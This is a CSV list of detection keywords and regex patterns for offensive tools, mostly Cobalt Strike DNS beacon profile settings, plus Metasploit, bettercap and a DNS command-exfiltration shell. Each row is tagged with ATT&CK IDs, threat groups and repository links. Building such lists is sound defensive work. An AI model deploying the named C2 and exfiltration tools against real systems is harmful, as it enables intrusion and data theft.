"*dns_beacon_dns_idle*",".{0,1000}dns_beacon_dns_idle.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","41169"
"*dns_beacon_dns_sleep*",".{0,1000}dns_beacon_dns_sleep.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","41170"
"*dns_beacon_dns_stager_prepend*",".{0,1000}dns_beacon_dns_stager_prepend.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","41171"
"*dns_beacon_dns_stager_subhost*",".{0,1000}dns_beacon_dns_stager_subhost.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","41172"
"*dns_beacon_dns_ttl*",".{0,1000}dns_beacon_dns_ttl.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","41173"
"*dns_beacon_get_A*",".{0,1000}dns_beacon_get_A.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","41174"
"*dns_beacon_get_TXT*",".{0,1000}dns_beacon_get_TXT.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","41175"
"*dns_beacon_maxdns*",".{0,1000}dns_beacon_maxdns.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","41176"
"*dns_beacon_ns_response*",".{0,1000}dns_beacon_ns_response.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","41177"
"*dns_beacon_put_metadata*",".{0,1000}dns_beacon_put_metadata.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","41178"
"*dns_beacon_put_output*",".{0,1000}dns_beacon_put_output.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","41179"
"*dns_bruteforce.rb*",".{0,1000}dns_bruteforce\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","41180"
"*dns_redir.sh *",".{0,1000}dns_redir\.sh\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/obscuritylabs/RAI","1","0","#linux","N/A","10","10","304","53","2024-11-24T16:29:36Z","2018-02-12T16:23:23Z","41181"
"*dns_server.py -d *",".{0,1000}dns_server\.py\s\-d\s.{0,1000}","offensive_tool_keyword","dns-black-cat","Multi platform toolkit for an interactive DNS shell commands exfiltration - by using DNS-Cat you will be able to execute system commands in shell mode over DNS protocol","T1140 - T1048.003 - T1071.004","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/lawrenceamer/dns-black-cat","1","0","N/A","N/A","10","10","114","20","2022-09-15T18:07:05Z","2021-02-13T11:31:22Z","41182"
"*dns_spoof.*",".{0,1000}dns_spoof\..{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 -  BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/bettercap/bettercap","1","1","#linux","network exploitation tool","10","10","17525","1526","2025-04-16T22:28:20Z","2018-01-07T15:30:41Z","41183"
"*dns_stager_prepend*",".{0,1000}dns_stager_prepend.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","N/A","10","10","964","143","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z","41184"
"*'dns_stager_prepend'*",".{0,1000}\'dns_stager_prepend\'.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","41185"
